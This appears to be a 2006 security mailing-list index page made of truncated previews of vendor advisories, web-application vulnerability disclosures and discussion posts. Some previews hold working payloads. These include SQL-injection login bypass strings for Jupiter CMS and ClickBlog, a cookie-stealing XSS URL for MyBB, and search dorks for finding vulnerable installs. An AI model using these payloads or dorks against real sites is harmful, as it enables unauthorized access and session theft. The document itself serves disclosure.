- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
The following references are available too:
SANS ISC:
http://isc.sans.org/diary.php?storyid=1701
http://isc.sans.org/diary.php?storyid=1705
Microsoft Security Advisory #925444:
http://www.microsoft.com/technet/security/advisory/925444.mspx
US-CERT VU#377369:
http://www.kb.cert.org/vuls/
On Bugtraq and several other security forums, Hadmut Danisch <[EMAIL
PROTECTED]>, a respected German information security analyst, recently
published a harsh critique of one optional feature in the SID800, one of the
newest of the six SecurID authentication tokens -- some with slightly different
rPath Security Advisory: 2006-0169-1
Published: 2006-09-15
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.7-0.1-1
thunderbird=/[EMAIL PROTECTED]:devel//1/1.
Hello
Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including
- Full path - make php shell - and create folder with 0777 permissions)
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]
/
vendor : easypage.org
BY : s3rv3r_hack3r
www : hackerz.ir & h4ckerz.com
bug : >
default.aspx?page=Search&app=Search&srch=[sql]
and more ...
I. BACKGROUND
Roller is the open source blog server that drives Sun Microsystem's
blogs.sun.com employee blogging site, IBM DeveloperWorks blogs, thousands of
internal blogs at IBM Blog Central, the Javalobby's 10,000 user strong JRoller
Java community site, and hundreds of other blogs world
Hi,
Apple Quicktime <= 7.1 is prone to a heap overflow vulnerability.
This flaw could lead to a remote code execution,if an attacker tricks
the victim to visit a malicious webpage with a specially crafted .fli
animation embedded.
The flaw is located within the "COLOR_64 chunk" Quicktime parser.
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-
Hello,
I would like to inform you about a vulnerability in Norton Personal Firewall.
Description:
Norton insufficiently protects its driver '\Device\SymEvent' against a manipulation by malicious applications and it
fails to validate its input buffer. It is possible to open this driver and sen
* phpQuiz sensitive file (install.php without authentification) + Files
containing interesting info (passwords for sql db)
* By : sn0oPy
* Risk : verry high
* Site : http://phpquiz.com/
* Dork : intitle:"phpQuiz" | " Développé par PhpQuiz v.1.0 " | "© PhpQuiz" |
inurl:"PhpQuiz"
* explo
http://www.gnucitizen.org/blog/google-search-api-worms
The service that concerns me the most is Google AJAX Search API, the
new JavaScript powered search widget. In this article I cover the
potential problems with Google AJAX Search API and how it can be used
by web worms to propagate.
--
pdp (a
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==
#SolpotCrew
Community
#
#phpBB XS (phpbb_root_path) Remote File Include
#
#Download file :
http://www.phpbbxs.eu/dload.php?action=category&cat_id=2
#
#
The IT Association @System http://www.atsystem.org is organizing the 4th
edition of the Convention on IT Security "Net&System Security" which
will be held at the Auditorium of Pisa’s CNR on October 17, 2006.
The event is being organized in collaboration with and coordination of
representatives of a
#Solpot Crew Community##
#
# ReviewPost 2.5 (RP_PATH) Remote File Inclusion
#
# Donwload File : http://3-bius.com/ReviewPost.zip
#
#
#
#
# Bug Fo
+
+
+ ppalCart V(2.5 EE) Remote File Inclusion
+
+---
+
+ Affected Software .: Software
+ Version .: ppalCart 2.5 EE
+ Venedor ...: h
[EMAIL PROTECTED],
There have been many vulnerability reports like this, and they don't
seem to make sense.
You are the first one to say that you actually tested it, and it
worked. Because you called it 'weird', you also clearly understand
that this does not make sense.
Maybe it's a bug in a v
Hello
Title : MyBB Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]
xss
archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=alert(document.cookie);
full path
I Certainly sent a report about the presence of a security error ; they know
from before ; but it's was working on all releases version 1.20 either No.
issuing the new version, which has not been the bug security by No. 1.30
patchwork and The owner's of this program knows where the error in the
# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
# Discovred By : ThE__LeO ;
# Software : Signkorn Guestbook v 1.3 ;
# Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 "
Signkorn Guestbook 1.2"
# Exploit : http://Www.Exampl
There are still a handful of these left, all discoverable using AxMan[1].
I reported this bug to Microsoft in either late July or August.
-HD
1. http://metasploit.com/users/hdm/tools/axman/
On Friday 15 September 2006 03:00, Tyop Tyip wrote:
> Does someone have more informations about a 0day on
Hello,,
Jupiter CMS Sql injections ,full path and xss vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]
if magic_quotes_gpc = off
login with
user name :
' or id=1/*
or
' or authorization = 4/*
It looks like the flaw is a buffer overflow and not a memory corruption
error.
Initially, FrSIRT has issued an advisory, "Microsoft Internet Explorer
"daxctle.ocx" KeyFrame Memory Corruption Vulnerability", detailing a new
zero-day Internet Explorer exploit. The exploit is reportedly successful
us
ENGLISH
# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
[CODE]
loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...
//Before
# ERNE ERNEALiZM BU ASK BiTMEZ
# mcLinksCounter v1.1 - Remote File Include Vulnerabilities
# site: http://www.comscripts.com/jump.php?action=script&id=847
# Script : mcLinksCounter v1.1
# Credits : ERNE
# Contact : [EMAIL PROTECTED] and irc.gigachat.n
ENGLISH
# Title : ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
//Before join login page
http://[target]/[path]/default.asp
Username : ' or '
Password : ' or ' and Login Ok
# ajann,Turkey
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1177-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 15th, 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1160-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 15th, 2006
#
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#===
Does someone have more informations about a 0day on ActiveX?
Here's my links:
http://www.milw0rm.com/exploits/2358
http://blogs.securiteam.com/index.php/archives/600
http://www.xsec.org/
--
Tyop?
General Objectives
The H2HC have as mainly objective offer a national and internation
conference for Brazilians Hackers, strongly the ethical of hacking.
We have as mission change and desmistify the word hacker from the
pejoractive sense to show the hacker as who works in software research and
se
32 matches
Mail list logo